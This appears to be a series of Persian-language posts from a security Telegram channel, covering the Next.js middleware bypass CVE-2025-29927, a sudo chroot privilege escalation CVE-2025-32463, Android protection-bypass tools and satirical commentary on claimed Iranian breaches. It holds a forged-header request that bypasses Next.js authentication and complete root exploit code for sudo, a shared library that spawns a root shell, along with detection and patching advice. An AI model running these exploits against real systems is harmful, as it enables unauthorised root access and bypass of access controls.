نوروز باستان بر ایرانیان پیروز باد 💐

🔴 تحلیل آسیب‌پذیری بحرانی CVE-2025-29927 در Next.js

یک آسیب‌پذیری خطرناک در فریم‌ورک Next.js شناسایی شده است که به مهاجمان امکان دور زدن کنترل‌های امنیتی Middleware را از طریق دستکاری هدر x-middleware-subrequest می‌دهد.
این آسیب‌پذیری می‌تواند منجر به دسترسی غیرمجاز به بخش‌های حساس برنامه شود.

-میزان خطر: بسیار بالا (Critical)
-دامنه تأثیرپذیری: بیش از ۹.۵ میلیون سرویس مبتنی بر Next.js
نسخه‌های آسیب‌پذیر: 11.x تا 15.x (نسخه‌های قبل از 15.2.3)


مکانیزم فنی Middleware در Next.js

وظیفه: پردازش درخواست‌ها قبل از رسیدن به صفحه مقصد.
مشکل: اگر هدر x-middleware-subrequest وجود داشته باشد، سیستم آن را به عنوان یک درخواست داخلی شناسایی می‌کند و Middleware را اجرا نمی‌کند (NextResponse.next()).

نمونه کد آسیب‌پذیر در next-server.ts :

if (subRequests.includes(middlewareInfo.name)) {
    return NextResponse.next(); // bypass Middleware
}

هکر می‌تواند مقدار middlewareInfo.name را حدس بزند (مثلاً pages/_middleware یا src/middleware).


نحوه اکسپلویت کردن :
یک نمونه برای نسخه‌های قدیمی (قبل از 12.2)
کافیست یک درخواست معمولی با هدر جعلی ارسال شود:

GET /admin HTTP/1.1
Host: example.com
x-middleware-subrequest: pages/_middleware

سیستم فکر می‌کند این یک درخواست "داخلی" است.
تمام مکانیزم های Middleware (مثل Auth) نادیده گرفته می‌شوند.

Reference:
https://github.com/azu/nextjs-cve-2025-29927-poc
@securation

⭕️ یک آسیب پذیری اجرای کد از راه دور (RCE) در برنامه Telegram برای سیستم عامل MacOS کشف شده که یک محقق امنیتی با استفاده از هوش مصنوعی Manus تونسته کشف کنه.
این آسیب پذیری از طریق یک روش خاص، محدودیت‌های فایل Telegram را دور می‌زند.
به این ترتیب، فایل‌های دانلود شده بدون نیاز به تأیید کاربر قابل اجرا هستند.
این آسیب پذیری در آخرین نسخه‌های Telegram برای MacOS نیز تست شده و کار می‌کند.

Reference:
https://mp.weixin.qq.com/s/RiFgghK96QN-201SE5q8ag
#Telegram #0day
@securation

⭕️ آیا بانک سپه هک شده ؟

چند روز قبل یک گروه هکری که چه عرض کنیم , یک کانال تلگرامی با 12 هزار عضو فیک و 100 عضو جدید که بهش اضافه شده بود ادعا کرد 12 ترابایت داده از بانک سپه هک کرده و در اختیار دارد.
درخواست باج چندین میلیون دلاری این کانال تلگرامی از بانک سپه ناکام ماند و آقای رضا همدانچی از اداره کل روابط عمومی بانک سپه با خبرگزاری فارس مصاحبه داشتن که ذکر کردند :‌ سیستم های بانک سپه غیرقابل هک و نفوذ هستند.
این ادعای آقای همدانچی ما رو یاد زیرساخت ریاست جمهوری ضد هک , سازمان انرژی اتمی ضد هک , زیرساخت بنادر ضد هک, تلویزیون رسمی کشوری ضد هک ,پمپ بنزین های ضد هک , مجددا صدا و سیمای ضد هک , بانک های ضد هک در سال 1403 که چندین میلیارد تومان باج پرداخت شد , و انواع زیرساخت هایی مهم کشور که اخیرا هک شد و درخبرگزاری ها اما ضد هک اعلام میشدند, انداخت.
این حرفهای مسئولین زیر ساختی شبیه آقای روح الله رحمانی استاد ماشین لرنینگ در دانشگاه تهران بود که با وجود داشتن دکتری هوش مصنوعی از امریکا و کار کردن و ارتباط در زیرساخت ریاست جمهوری میگفت من گوشیم رو روت کردم و اندروید اپن سورس ریختم تا به گوگل وابسته نباشه چون مال آمریکاست.
همزمان از ایمیل مایکروسافتی استفاده میکرد بالخره یه مدتی کارمند شرکت مایکروسافت هم بود این بزرگوار :) بالخره گوگل امریکا با مایکروسافت امریکا فرق داره :)
ته سخنرانی های مذهبی که داشت سر کلاس هم اشاره میکرد که سرویس های ما فقط با آیپی ایران بالا میان و غیرقابل هک هستند , تهش همون غیرقابل هک همیشگی در خبرگزاری ها اعلام شد با دیتایی ارزشمند در دست گروه های هکری:)
حالا باید ببینیم این گروه تلگرامی که ادعای هک بانک سپه رو داشتند و گفتن با SQLI تونستن رول های فایروال رو بایپس کنند و نمونه ( sampel ) ✅ هم گذاشتن :دی که فعلا شماره کارت اقای روابط عمومی رو و مشخصات اشتباه از آب دراومده تا در آینده ببینیم چه خواهد شد.
فعلا که این کانال تلگرامی ما رو یاد نیما دنجر انداختن و انگار نوه های ایشونند که با zero-day و بروت فورس کوانتومی و شکستن رمزنگاری ها بانک سپه رو هک کردند.:)
همزمان با نوشتن این پست برای کانال نگاهی انداختم و دیدم که اطلاعیه دادند که 42 میلیون مشتری بانک سپه نام و نام خانوادگی و کد ملی و شماره تلفن و محل سکونت خودشون رو عوض کنند ✅🎞
فردا افتا میاد یک فایل شونصد مگابایتی رو اطلاعیه میده به همه سازمان ها که نصب کنید و codebreakers Detector هست شناسایی میکنه:)‌
همزمان که خودش رو اگر ران کنید احتمال زیادی آنتی ویروس سازمانی توی شبکه ببنده چون دراپ کردن کلی فایل همزمان خودش رفتار مشکوکه::دی
بعدا ابزار افتا رو مهندسی معکوس میکنید میبینید همون رول های YARA هستند که اگر دفعات قبل با CPP مینوشتن اینبار با استاد Python نوشتن .
بالخره کسپراسکای باید از ما الگوبرداری داشته باشه دیگه مگه نه ؟


هشتگ #مسئولین #ضد #هک
@securation

⭕️تحلیل و بررسی آسیب‌پذیری امنیتی در Next.js (CVE-2025-29927)

در واقع Next.js یکی از محبوب‌ترین فریم‌ورک‌های React برای توسعه‌ی وب اپلیکیشن‌ها است که امکانات زیادی برای بهینه‌سازی عملکرد ارائه می‌دهد.
با این حال، همانند هر فناوری دیگری، Next.js نیز ممکن است آسیب‌پذیری‌هایی داشته باشد که در صورت عدم به‌روزرسانی، می‌تواند به هکرها اجازه‌ی سوءاستفاده دهد.

حالا قراره آسیب‌پذیری CVE-2025-29927 را بررسی کنیم، نحوه‌ی شناسایی آن را توضیح می‌دهیم و روش‌هایی برای پچ کردن آن ارائه می‌کنیم.

چگونه یک اپلیکیشن Next.js آسیب‌پذیر را شناسایی کنیم؟

روش‌های رایج برای شناسایی Next.js
برای شناسایی اینکه آیا یک وب اپلیکیشن از Next.js استفاده می‌کند یا نه، می‌توان از تکنیک‌های زیر استفاده کرد:

1. برخی سرورها در هدرهای HTTP مقدار X-Powered-By: Next.js را ارسال می‌کنند.

2. فایل‌های JS و CSS تولید شده توسط Next.js معمولاً در مسیر زیر قرار دارند.

/_next/static/

3. در مرورگر، آبجکت next به‌صورت گلوبال تعریف شده است که نسخه‌ی Next.js را نمایش می‌دهد.
اپلیکیشن‌های Next.js معمولاً یک آبجکت گلوبال (window.next) در سمت کلاینت دارند که شامل اطلاعات نسخه‌ی Next.js است. این مورد را می‌توان از طریق کنسول مرورگر بررسی کرد:

console.log(window.next?.version);

شناسایی نسخه‌ی آسیب‌پذیر
با ترکیب روش‌های بالا، می‌توان اپلیکیشن‌هایی را که از نسخه‌های آسیب‌پذیر Next.js استفاده می‌کنند، شناسایی کرد. با این حال، فقط شناسایی نسخه‌ی آسیب‌پذیر کافی نیست!
بلکه باید بررسی کنیم که آیا مسیرهای حساس واقعاً تحت تأثیر این آسیب‌پذیری قرار دارند یا خیر.

تشخیص مسیرهای آسیب‌پذیر
مسیرهای آسیب‌پذیر معمولاً توسط مکانیزم احراز هویت محافظت می‌شوند و پیدا کردن آن‌ها از طریق Crawling یا FUZZING ساده کارآمد نیست. به این دلیل که:
بسیاری از اپلیکیشن‌های Next.js به صورت SPA (Single Page Application) اجرا می‌شوند و Crawling آن به ابزارهای پیشرفته‌تری مثل مرورگرهای Headless نیاز دارد.
مسیرهای آسیب‌پذیر معمولاً به‌صورت مخفی در کدهای جاوا اسکریپت تعریف می‌شوند و Crawler سنتی به آن‌ها دسترسی ندارند.

روش جایگزین: استخراج مسیرهای API از فایل‌های JS
به جای اتکا به Crawling، می‌توان از تحلیل سورس‌کد جاوا اسکریپت یا استفاده از اکستنشن BurpJsLinkFinder برای استخراج مسیرهای مهم مثل API استفاده کرد. در این روش:

1- با تحلیل سورس کد JS یا استفاده از BurpJsLinkFinder میتوانیم مسیرهای مهم رو بیرون بکشیم و تو یه فایل ذخیره کنیم.
2- سپس مسیرهای استخراج شده، با یک Nuclei template مخصوص آزمایش می‌شوند تا ببینیم که آیا واقعاً آسیب‌پذیر هستند یا خیر.
یک نمونه Template خوب برای Nuclei از ProjectDiscovery

مثال از یک مسیر API در یک فایل جاوا اسکریپت:

const BASE_API = "/api/v1";

function getUser(id) {
  http.get(BASE_API + "/user/" + id);
}

نتیجه‌ی تحلیل این کد، مسیر زیر را مشخص می‌کند:

GET /api/v1/user/{id}

با استفاده از این روش، میشه مسیرهای پنهان و آسیب‌پذیر را شناسایی کرد و بدون نیاز به Crawling، به‌صورت دقیق‌تر این آسیب‌پذیری را تحلیل کرد.


چند اقدام و راهکار در مواجه با CVE-2025-29927 برای تیم Develop
بهترین راهکار: آپدیت کردن به نسخه‌ی امن Next.js
بهترین و موثرترین روش برای جلوگیری از این آسیب‌پذیری، به‌روزرسانی Next.js به نسخه‌ی پچ‌شده است.

اقدامات موقت (در صورت عدم امکان آپدیت فوری)
اگر امکان آپدیت فوری وجود ندارد، می‌توان به‌صورت موقت اقدامات زیر را انجام داد:

1. بلاک کردن هدر x-middleware-subrequest در تنظیمات سرور، WAF یا پروکسی برای جلوگیری از اکسپلویت.
2. مانیتورینگ لاگ‌ها و بررسی درخواست‌های مشکوک که شامل این هدر می‌شوند.
@securation

⭕️ PairIP Protection Remover

یک ابزار ساده و چند پلتفرمی برای دور زدن پروتکشن PairIP گوگل در برنامه‌های Flutter می باشد که در هر دو نسخه پایتون و بش موجود است.

📎 GitHub

@Securation
#Android #RE #Pairip #Flutter

⭕️ FridaScriptGen

این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن می‌کند و سپس به طور خودکار اسکریپت‌های Frida را برای دور زدن این بررسی‌های امنیتی ایجاد می‌کند.

📎 GitHub

@Securation
#Android #Frida

⭕️ Frida Launcher 🚀

سرور Frida را به راحتی و تنها با یک لمس، روی دستگاه‌های اندروید و شبیه‌سازها مدیریت کنید!

📎 GitHub

@Securation
#Android #Frida

⭕️ اخیرا آسیب ‌پذیری‌جدیدی از نوع LPE اخیرا با شناسه CVE-2025-32463 منتشر شده. این آسیب‌پذیری در صورتی فعال می‌شود که از پارامتر --Chroot استفاده شده و مسیر nsswitch.conf به صورت دستی کنترل شود.
به طوری که اگر در پیکربندی route از pass: unix:/path/to/socket استفاده شده باشد و پارامتر Share تنظیم نشده باشد، Sudo قبل از بارگذاری sudoers، فایل nsswitch.conf را از محیط chroot می خواند.
این یعنی مهاجم توانایی قرار دادن فایل تقلبی و یک shared object مخرب، اجرای کد به عنوان root انجام دهد بدون نیاز به اینکه در فایل sudoers ثبت شده باشد.
مراحل مربوط به رسیدن به سطح دسترسی مورد نیاز:
ساخت دایرکتوری chroot و فایل‌های موردنیاز

mkdir -p /tmp/pwnroot/etc
mkdir -p /tmp/pwnroot/lib

نوشتن shared library مخرب

#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <stdio.h>

__attribute__((constructor)) void pwn() {
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/bash");
}

کامپایل shared library

gcc -fPIC -shared -o libnss_myexploit.so.2 myexploit.c

اجرای اکسپلویت

sudo -R /tmp/pwnroot id

#RedTeam #LPE #EXP
@securation

⭕️ مرکز فابا کجاست؟
مرکز فناوری نوین آفتابه سازان دستشویی های بین راهی.

مداد پرس ؟
مرکز دیجیتال احمق های امنیت داده.

با DDOS زدن تونستن دسترسی بگیرند و نفوذ کنند؟
بعد همزمان با حمله سایبری از نوع DDOS دستور تخلیه ساختمان ها رو دادند؟

احتمالا پکت هایی که ارسال میشه هرکدوم حاوی موشک و پهپاد بوده مگه نه؟ مثلا در یک پکت ارسال شده اومدن ترافیک رو تحلیل کردن حاوی نیم کیلو TNT بوده دستور تخلیه شعبات داده شده.


#دستشوییهای_سایبری

@securation

⭕️ امنیت⁩ CI/CD رو امشب در خدمتتون هستیم:

‏🕘 ساعت ۹

‏💡روشهای نفوذ از طریق CI/CD
‏💡دسترسی به سرورهای تست و پروداکشن
‏💡دسترسی به SECRETها
‏💡اصول امن سازی و توسعه امن نرم افزار

meet.google.com/rdr-cutu-qwd

#CICD #Security
@securation